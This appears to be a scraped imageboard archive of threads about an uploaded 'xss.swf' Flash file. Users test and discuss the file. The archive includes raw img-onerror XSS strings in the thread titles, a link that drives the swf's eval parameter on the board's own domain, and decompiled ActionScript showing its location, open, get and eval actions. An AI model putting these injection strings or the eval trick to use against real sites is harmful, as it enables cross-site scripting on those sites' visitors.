File: test.swf-(5 KB, 550x400, Other)
[_] Johnyfffffffff Johnyfffffffff 2398195 Johnyfffffffff
>> [_] Anon 2398221 I don't think the xss worked on me. noscript for lyfe. cool shit though
>> [_] Anon 2398250 This is what I got. Latest Mozilla Firefox (29.0.1). NoScript not installed. http://gyazo.com/db0e942bad7c0a83aa6600a 6d3f8fd3d
>> [_] Anon 2398253 I don't know if I like what this stuff is supposed to do, because I do not know what it is supposed to do.

File: xss.swf-(5 KB, 550x400, Other)
[_] "><img src=x onerror=alert(1)> LALKA"><img src=x onerror=alert(1)> 2380367 "><img src=x onerror=alert(1)>
>> [_] Anon 2380380 >># I am afraid to click.
>> [_] Anon 2380382 >># Someone click and post results if possible
>> [_] Anon 2380384 >># Here goes.
>> [_] Anon 2380387 >># Just some instructions on how to link things.
>> [_] Anon 2380389 I used the embed button out of fear. Nothing happened, and scans seems to indicate it didn't do anything either. It was saying repeatedly "lol! cool :3" on another /f/ thread.
>> [_] Anon 2380391 >># Open it with Google Chrome, it displays some kind of instructions.
>> [_] Anon 2380393 >># >># Honestly?
>> [_] Anon 2380394 >># Yup.
>> [_] Anon 2380395 http://i.4cdn.org/f/xss.swf?a=eval&c=whi le(true){alert(%22hello!%20:3%22)}
>> [_] Anon 2380397 Wow, okay. That's... neat.
>> [_] Anon 2380438 >># Correction: it displays instructions in an alert window.
>> [_] Anon 2380441 Decompiled. It's an xss vulnerability tester. Nothing bad here. public function attack(param1) { var _loc_2:URLLoader = null; var _loc_3:String = null; switch(param1){ case "location":{ navigateToURL(new URLRequest(this.cmd), "_self"); break; } case "open":{ navigateToURL(new URLRequest(this.cmd), "_blank"); break; } case "get":{ _loc_2 = new URLLoader(new URLRequest(this.cmd)); _loc_2.addEventListener(Event.COMPLETE, this.get_complete); _loc_2.addEventListener(SecurityErrorEve nt.SECURITY_ERROR, this.get_sec_error); break; } case "eval":{ ExternalInterface.call("eval", this.cmd); break; }
>> [_] Anon 2380442 >># default:{ _loc_3 = "a(action) - c(cmd)\n"; _loc_3 = _loc_3 + "-----------------\n"; _loc_3 = _loc_3 + "1. location to url: xss.swf?a=location&c=http://www.google.c om/\n"; _loc_3 = _loc_3 + "2. open url to new window: xss.swf?a=open&c=http://www.google.com/\ n"; _loc_3 = _loc_3 + "3. http request to url: xss.swf?a=get&c=http://www.google.com/\n "; _loc_3 = _loc_3 + "4. eval js codz: xss.swf?a=eval&c=alert(document.domain)\ n"; _loc_3 = _loc_3 + "-----------------\n"; _loc_3 = _loc_3 + "by evilcos@gmail.com"; ExternalInterface.call("alert", _loc_3); break; break; } } stop(); return; }
>> [_] Anon 2380449 it opened a gmail window weird
>> [_] Anon 2380486 >># What's did you use for that if you don't mind?

File: xss.swf-(5 KB, 550x400, Other)
[_] test test 2375252 test
>> [_] Anon 2375263 gj anon
>> [_] Anon 2375268 and the point of that was?
>> [_] Anon 2375269 Nice try, not clicking that button.
>> [_] Anon 2375280 I'M BEING HACKED HELP
>> [_] Anon 2375328 >https://github.com/evilcos/xss.swf >5 KB Most likely not even his. It's supposed to open to www.google.com to check for SWF vulnerability.